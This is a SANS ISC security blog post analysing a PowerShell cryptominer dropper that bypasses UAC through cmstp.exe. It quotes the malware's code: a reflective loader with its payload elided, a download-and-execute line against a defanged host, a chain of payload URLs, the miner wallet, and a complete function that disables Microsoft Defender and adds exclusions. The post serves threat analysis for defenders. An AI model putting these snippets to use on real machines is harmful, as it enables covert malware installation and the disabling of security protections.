Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: InfoSec Handlers Diary Blog InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Bypassing UAC to Install a Cryptominer

Published: 2019-12-26
Last Updated: 2019-12-26 07:53:16 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

First of all, Merry Christmas to all our readers! I hope you're enjoying the break with your family and friends! Even if everything slows down in this period, there is always malicious activity ongoing. I found a small PowerShell script that looked interesting for a quick diary. First of all, it has a VT score of 2/60[1]. It installs a cryptominer and its most interesting feature is the use of a classic technique to bypass UAC[2].

To achieve this, it uses the cmstp.exe tool and a DLL. This binary is used by the Microsoft Connection Manager Profile Installer to deploy .inf files.  It is located in C:\Windows\System32\ or C:\Windows\SysWOW64\ which are listed as trusted directories by AppLocker.

First, the script kills existing cmstp.exe processed running:

cmd.exe /C taskkill /IM cmstp.exe /f;

Then, it implements a function to bypass UAC by loading a malicious DLL:

function Bypass-UAC
{
    Param([Parameter(Mandatory = $true, Position = 0)][string]$Command)
    if(-not ([System.Management.Automation.PSTypeName]"CMSTPBypass").Type)
    {
        $a = $a + "<base64_data>";
        $a = $a + "<base64_data>;
        ...
        $a = $a + "<base64_data>";
        [Reflection.Assembly]::Load([Convert]::FromBase64String("$a")) | Out-Null
    }
    [CMSTPBypass]::Execute($Command)
}

This technique is not new and has been borrowed by the developers from another source[3]. The loaded DLL is well-know on VT and has a decent score: 26/66[4].

This function is used to grab and launch extra PowerShell scripts:

IEX (New-Object Net.WebClient).DownloadString('hxxp://trsurl[.]com/sa/UAC_WIN_10_Run_Miner')

Multiple URLs are visited and extra code downloaded:

hxxp://trsurl[.]com/sa/UAC_WIN_10_Run_Miner
 > hxxps://hastebin[.]com/raw/odazicisiq
   > hxxp://trsurl[.]com/sa/Miner
     > hxxps://hastebin[.]com/raw/sidodoquse

The miner is a simple XMRIG with user ID: 42PkwcWLCjheUAaXy2h6CndY9DoKvv4pQ6QogCxgnFFF268ueYNb2FXiLCgQeds64jAytuaXzFTctbsujZYzUuaRVhn8Cjd. Besides the classic function to "seek & hunt" unwanted processes (AV and other competing miners), there is an interesting function used to disable Microsoft Defender:

function disable_defender{
    Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore;
    Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore;
    Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction Ignore;
    Set-MpPreference -DisableIOAVProtection $true -ErrorAction Ignore;
    Set-MpPreference -DisablePrivacyMode $true -ErrorAction Ignore;
    Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -ErrorAction Ignore;
    Set-MpPreference -DisableArchiveScanning $true -ErrorAction Ignore;
    Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction Ignore;
    Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore;
    Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore;
    Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore;
    Set-MpPreference -HighThreatDefaultAction 6 -Force -ErrorAction Ignore;
    Set-MpPreference -ModerateThreatDefaultAction 6 -ErrorAction Ignore;
    Set-MpPreference -LowThreatDefaultAction 6 -ErrorAction Ignore;
    Set-MpPreference -SevereThreatDefaultAction 6 -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\Users\Public\Libraries\ -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\Users\Public\Libraries -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\win32.zip -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\x32\ -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\win64.zip -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\x64\ -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\x64\xmrig-2.3.1-gcc-win64\xmrig-2.3.1-gcc-win64\xmrig-2.3.1 -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\x32\xmrig-2.3.1-gcc-win32\xmrig-2.3.1-gcc-win32\xmrig-2.3.1 -ErrorAction Ignore;
    Add-MpPreference -ExclusionProcess "xmrig.exe" -ErrorAction Ignore;
    Add-MpPreference -ExclusionExtension ".exe" -ErrorAction Ignore;
}

[1] https://www.virustotal.com/gui/file/c5ec59f873fe31025703855a2406845199d2da221738d3c76daa3b9996c6cd14/detection
[2] https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works
[3] https://www.who-ami.net/how-to-bypass-uac-in-newer-windows-versions/
[4] https://www.virustotal.com/gui/file/da9fc045098c3502920dee3fe65660de0049792307605f89b08361e28ce74dad/details

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
Diary Archives